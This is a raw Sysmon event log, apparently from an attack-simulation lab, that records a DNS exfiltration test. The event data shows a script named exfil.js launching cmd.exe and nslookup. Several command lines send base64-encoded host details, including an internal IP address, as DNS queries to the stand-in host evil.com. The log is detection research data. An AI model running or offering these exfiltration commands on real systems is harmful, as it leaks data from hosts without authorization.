14:21:27.926{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-1443-000000005F02}7036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.926{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.926{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.926{2E1864BB-18E7-629A-1243-000000005F02}51927704C:\Windows\system32\cmd.exe{2E1864BB-18E7-629A-1443-000000005F02}7036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.926{2E1864BB-18E7-629A-1443-000000005F02}7036C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E7-629A-1243-000000005F02}5192C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxdi.tmp 2>&1 10341000x8000000000000000207540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.910{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-1343-000000005F02}6044C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.910{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-1343-000000005F02}6044C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.894{2E1864BB-18E7-629A-1343-000000005F02}60443548C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-1243-000000005F02}5192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.879{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-1343-000000005F02}6044C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.879{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.879{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.879{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.879{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.879{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-1243-000000005F02}5192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.879{2E1864BB-18E0-629A-6742-000000005F02}39765060C:\Windows\System32\WScript.exe{2E1864BB-18E7-629A-1243-000000005F02}5192C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.885{2E1864BB-18E7-629A-1243-000000005F02}5192C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NDogMTAuMC4xLjE0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxdi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.841{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvvsqo.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000207528Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.643{00000000-0000-0000-0000-000000000000}5384<unknown process>-udpfalsefalse127.0.0.1-50518-false127.0.0.1-53domain 354300x8000000000000000207527Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.643{00000000-0000-0000-0000-000000000000}5384<unknown process>-udptruefalse127.0.0.1-50518-false127.0.0.1-53domain 354300x8000000000000000207526Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.574{00000000-0000-0000-0000-000000000000}7388<unknown process>-udpfalsefalse127.0.0.1-50516-false127.0.0.1-53domain 22542200x8000000000000000207525Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.374{00000000-0000-0000-0000-000000000000}7632evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000207524Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.573{00000000-0000-0000-0000-000000000000}7388<unknown process>-udpfalsefalse127.0.0.1-50515-false127.0.0.1-53domain 22542200x8000000000000000207523Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.312{00000000-0000-0000-0000-000000000000}6408evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000207522Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.515{00000000-0000-0000-0000-000000000000}488<unknown process>-udpfalsefalse127.0.0.1-50514-false127.0.0.1-53domain 354300x8000000000000000207521Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.514{00000000-0000-0000-0000-000000000000}488<unknown process>-udpfalsefalse127.0.0.1-50513-false127.0.0.1-53domain 22542200x8000000000000000207520Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.244{00000000-0000-0000-0000-000000000000}7380evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000207519Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.513{00000000-0000-0000-0000-000000000000}488<unknown process>-udpfalsefalse127.0.0.1-50512-false127.0.0.1-53domain 22542200x8000000000000000207518Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.159{00000000-0000-0000-0000-000000000000}4776evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000207517Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.452{00000000-0000-0000-0000-000000000000}1400<unknown process>-udptruefalse127.0.0.1-50511-false127.0.0.1-53domain 354300x8000000000000000207516Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.452{00000000-0000-0000-0000-000000000000}1400<unknown process>-udpfalsefalse127.0.0.1-50510-false127.0.0.1-53domain 22542200x8000000000000000207515Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:26.065{00000000-0000-0000-0000-000000000000}7532evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000207514Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.452{00000000-0000-0000-0000-000000000000}1400<unknown process>-udptruefalse127.0.0.1-50510-false127.0.0.1-53domain 22542200x8000000000000000207513Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.987{00000000-0000-0000-0000-000000000000}896evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000207512Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.359{00000000-0000-0000-0000-000000000000}5592<unknown process>-udpfalsefalse127.0.0.1-50506-false127.0.0.1-53domain 22542200x8000000000000000207511Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.913{00000000-0000-0000-0000-000000000000}4848evil.com0::ffff:127.0.0.1;<unknown process> 354300x8000000000000000207510Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:25.293{00000000-0000-0000-0000-000000000000}6580<unknown process>-udpfalsefalse127.0.0.1-50505-false127.0.0.1-53domain 10341000x8000000000000000207509Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.810{2E1864BB-18E7-629A-1043-000000005F02}61084808C:\Windows\system32\conhost.exe{2E1864BB-18E7-629A-1143-000000005F02}8040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207508Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.794{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207507Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.794{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207506Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.794{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207505Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.794{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207504Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.794{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E7-629A-1143-000000005F02}8040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207503Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.794{2E1864BB-18E7-629A-0F43-000000005F02}65208C:\Windows\system32\cmd.exe{2E1864BB-18E7-629A-1143-000000005F02}8040C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207502Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.804{2E1864BB-18E7-629A-1143-000000005F02}8040C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E7-629A-0F43-000000005F02}6520C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlvvsqo.tmp 2>&1 10341000x8000000000000000207501Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.778{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-1043-000000005F02}6108C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207500Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.778{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E7-629A-1043-000000005F02}6108C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207499Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 